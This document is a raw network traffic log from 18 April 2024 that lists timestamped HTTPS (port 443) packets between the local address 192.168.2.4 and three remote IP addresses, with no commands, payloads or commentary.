Apr 18, 2024 01:23:14.481944084 CEST	49736	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.828047037 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.828094006 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.828145027 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.828263998 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.828319073 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.828546047 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.828547001 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.828613043 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.828663111 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.829070091 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.829108000 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.829132080 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.829142094 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.829154015 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.829188108 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.829190016 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.829240084 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.829256058 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.829998970 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.830079079 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.830092907 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.830132961 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.830159903 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.830183983 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.830200911 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.830259085 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.830588102 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.830744982 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.830800056 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.830813885 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.830893040 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.830945969 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.830971003 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.831002951 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.831073046 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.831545115 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.831732988 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.831790924 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.831804037 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.831888914 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.831944942 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.831958055 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.832570076 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.832632065 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.832644939 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.832727909 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.832784891 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.832798958 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.832881927 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.832935095 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.832947969 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.833379030 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.833435059 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.833447933 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.833530903 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.833585024 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.833597898 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.834286928 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.834371090 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.834383965 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.834434032 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.834466934 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.834527969 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.866911888 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.866971016 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.988182068 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:14.988259077 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:14.988368034 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:14.989955902 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:14.990034103 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.014715910 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.014759064 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.014826059 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.016107082 CEST	49741	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.016184092 CEST	443	49741	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.016282082 CEST	49741	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.016807079 CEST	49742	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.016884089 CEST	443	49742	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.016973972 CEST	49742	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.017429113 CEST	49743	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.017505884 CEST	443	49743	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.017584085 CEST	49743	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.019159079 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.019176960 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.019968033 CEST	49743	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.020041943 CEST	443	49743	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.020275116 CEST	49742	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.020344019 CEST	443	49742	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.020957947 CEST	49741	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.021025896 CEST	443	49741	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.206635952 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.206949949 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.207006931 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.207892895 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.207976103 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.209301949 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.209371090 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.210089922 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.210108995 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.248092890 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.248658895 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.248660088 CEST	443	49742	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.248687029 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.248878956 CEST	443	49743	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.248908997 CEST	49742	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.248974085 CEST	443	49742	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.249104977 CEST	443	49741	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.249505043 CEST	49743	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.249562979 CEST	443	49743	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.249624968 CEST	49741	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.249680996 CEST	443	49741	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.250319004 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.250396013 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.250614882 CEST	443	49742	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.250685930 CEST	49742	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.251204014 CEST	443	49743	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.251285076 CEST	49743	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.251341105 CEST	443	49741	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.251411915 CEST	49741	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.254261017 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.254348993 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.254426003 CEST	49742	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.254555941 CEST	443	49742	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.255584002 CEST	49741	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.255688906 CEST	49743	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.255714893 CEST	443	49741	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.255790949 CEST	443	49743	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.258755922 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.258764029 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.259088993 CEST	49742	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.259147882 CEST	443	49742	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.259428024 CEST	49741	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.259484053 CEST	443	49741	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.259974957 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.262229919 CEST	49743	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.262260914 CEST	443	49743	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.307271004 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.307415009 CEST	49741	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.307418108 CEST	49743	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.307445049 CEST	49742	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.451039076 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.451651096 CEST	443	49741	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.451672077 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.451741934 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.451750040 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.451771975 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.451828003 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.451855898 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.451878071 CEST	443	49741	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.451999903 CEST	49741	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.454700947 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.454770088 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.454778910 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.454894066 CEST	443	49743	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.455185890 CEST	443	49743	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.455336094 CEST	443	49742	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.455387115 CEST	49743	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.455565929 CEST	443	49742	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.455635071 CEST	49742	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.455651999 CEST	443	49742	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.455678940 CEST	443	49742	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.455770969 CEST	49742	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.455806971 CEST	443	49742	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.455838919 CEST	443	49742	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.455902100 CEST	49742	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.458204031 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.458250046 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.458256006 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.458435059 CEST	49741	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.458494902 CEST	443	49741	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.462902069 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.462969065 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.462975025 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.465320110 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.465379953 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.465385914 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.467109919 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.467226028 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.467293024 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.467355967 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.467420101 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.467484951 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.467509031 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.467509031 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.467571974 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.467633963 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.467657089 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.467709064 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.467726946 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.467797041 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.467850924 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.467860937 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.467883110 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.467936039 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.467950106 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.468291998 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.468343019 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.468357086 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.468429089 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.468477964 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.468492031 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.468539000 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.468540907 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.468597889 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.468604088 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.468640089 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.468653917 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.469014883 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.469063997 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.469077110 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.469147921 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.469202995 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.469212055 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.469229937 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.469289064 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.470007896 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.470141888 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.470197916 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.470201969 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.470220089 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.470263004 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.470280886 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.470911026 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.470966101 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.470979929 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.471072912 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.471120119 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.471132994 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.471219063 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.471292019 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.471292019 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.471313953 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.471369028 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.471776962 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.471889973 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.471939087 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.471945047 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.471957922 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.471999884 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.472007036 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.472038984 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.472058058 CEST	49743	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.472088099 CEST	443	49743	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.472095966 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.472126007 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.472763062 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.472831011 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.472845078 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.475485086 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.475538015 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.475544930 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.479322910 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.479372978 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.479379892 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.482825994 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.482886076 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.482892990 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.484730959 CEST	49742	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.484788895 CEST	443	49742	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.489558935 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.489615917 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.489623070 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.493724108 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.493777037 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.493782997 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.524466991 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.541245937 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.556072950 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.556958914 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.557012081 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.557019949 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.560195923 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.560245991 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.560250998 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.563417912 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.563472986 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.563479900 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.566394091 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.566442013 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.566447973 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.572417974 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.572525978 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.572563887 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.572597027 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.572619915 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.572635889 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.572664022 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.572881937 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.572941065 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.572959900 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.572984934 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.573014021 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.573025942 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.573057890 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.573776007 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.573851109 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.573863983 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.573894978 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.573916912 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.573930025 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.573956013 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.574572086 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.574642897 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.574661970 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.574713945 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.574733019 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.574820042 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.574878931 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.577441931 CEST	49739	443	192.168.2.4	104.17.25.14
Apr 18, 2024 01:23:15.577466965 CEST	443	49739	104.17.25.14	192.168.2.4
Apr 18, 2024 01:23:15.583633900 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.583653927 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.583673954 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.583693981 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.583703041 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.583718061 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.583736897 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.583749056 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.583765984 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.583777905 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.583796024 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.583830118 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.595725060 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.595793962 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.595796108 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.595830917 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.595845938 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.595874071 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.606806993 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.606848955 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.606877089 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.606884003 CEST	443	49740	199.36.158.100	192.168.2.4
